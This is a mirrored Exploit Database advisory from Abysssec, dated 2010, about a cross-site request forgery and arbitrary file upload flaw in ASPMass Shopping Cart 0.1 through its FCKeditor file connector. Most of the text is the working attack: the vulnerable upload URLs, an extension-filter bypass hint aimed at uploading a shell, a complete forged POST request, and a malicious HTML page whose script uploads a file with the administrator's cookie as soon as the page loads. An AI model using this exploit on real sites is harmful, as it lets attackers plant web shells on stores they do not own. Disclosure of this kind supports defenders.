ASPMass Shopping Cart – Arbitrary File Upload / Cross-Site Request Forgery

• Exploit Database
• 132 阅读

• 作者： Abysssec
  日期： 2010-09-30
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/15160/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164

  &apos;&apos;&apos; ________ __ ____ |\/|/ __ \ /\| || |_ \ | \/ | || | /\ | || | |_) | | |\/| | || |/ /\ \| || |_ < | || | |__| / ____ \ |__| | |_) | |_||_|\____/_/\_\____/|____/   http://www.exploit-db.com/moaub-30-aspmass-shopping-cart-vulnerability-file-upload-csrf/ &apos;&apos;&apos;   Abysssec Inc Public Advisory Title:ASPMass Shopping Cart Vulnerability File Upload CSRF Affected Version :ASPMass Shopping Cart 0.1 Discovery:www.abysssec.com Vendor :http://www.aspmass.com/ Demo :http://www.aspmass.com/demo.htm Admin Page :http://Example.com/Admin/Login.aspx   Description : =========================================================================================== This version of ASP Shopping Cart has CSRF vulnerability for upload a file with fckEditor. But we have two limitation :   1- We need Admin&apos;s Cookie 2- Specific file extension implementing by FckEditor v2 and bypassing this barrier is on you. For example the file with this extension shell.aspx;me.xml will be upload with this extension : shell_aspx;me.xml     you can upload your file with this paths: (of course with CSRF) http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/ http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?time=1280125833981&Type=File&CurrentFolder=/ http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/test.html http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/uploadtest.html     Uploaded files will be placing in this path:   .../Files/site/file/ .../Files/site/flash/ .../Files/site/image/ .../Files/site/media/   vulnerable Code: The misconfiguration is in ...\Images\js\fcKeditor\editor\filemanager\connectors\aspx\config.ascx ln 40: private bool CheckAuthentication() { if (Session["AdminLogedIn"] == "Yes") { return true; } else { return false; } }     For example you can feed this POST Request to Admin :   ---------------------------------------------------------------------------------------- POST http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File&CurrentFolder=/ HTTP/1.1 Host: Example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/uploadtest.html Cookie: ASP.NET_SessionId=ejskxhea4eqnkirsbxebj145 Content-Type: multipart/form-data; boundary=---------------------------92203111132182 Content-Length: 198     -----------------------------92203111132182 Content-Disposition: form-data; name="NewFile"; filename="Test.xml" Content-Type: text/plain   This is a shell... -----------------------------92203111132182--   With this POST Request, the file Test.xml uploads i this path: .../Files/site/     The Source of HTML Page Malicious Link) =========================================================================================== With this page, we send a request with AJAX to upload a file with Admin&apos;s Cookie.     <html> <head> <title >Wellcome to ASP Shopping Cart!</title> Hello! ... ... ... This page uploads a file with "xml" extension   <script>   var binary; var filename;   function FileUpload() { try { netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect"); } catch (e) { }   var http = false; if (window.XMLHttpRequest) { http = new XMLHttpRequest(); } else if (window.ActiveXObject) { http = new ActiveXObject("Microsoft.XMLHTTP"); }   var url = "http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File&CurrentFolder=/"; var filename = &apos;Test.xml&apos;; var filetext = &apos; This is a shell ... &apos;;   var boundaryString = &apos;---------------------------92203111132182&apos;; var boundary = &apos;--&apos; + boundaryString; var requestbody = boundary + &apos;\n&apos; + &apos;Content-Disposition: form-data; name="NewFile"; filename="&apos; + filename + &apos;"&apos; + &apos;\n&apos; + &apos;Content-Type: text/plain&apos; + &apos;\n&apos; + &apos;\n&apos; + filetext + &apos;\n&apos; + boundary;   http.onreadystatechange = done; http.open(&apos;POST&apos;, url, true);   http.setRequestHeader("Content-type", "multipart/form-data; boundary=" + boundaryString); http.setRequestHeader("Connection", "close"); http.setRequestHeader("Content-length", requestbody.length); http.send(requestbody); } function done() { if (http.readyState == 4 && http.status == 200) { //alert(http.responseText); //alert(&apos;Upload OK&apos;); } } </script> </head> <body onload ="FileUpload();"> </body> </html>   ===========================================================================================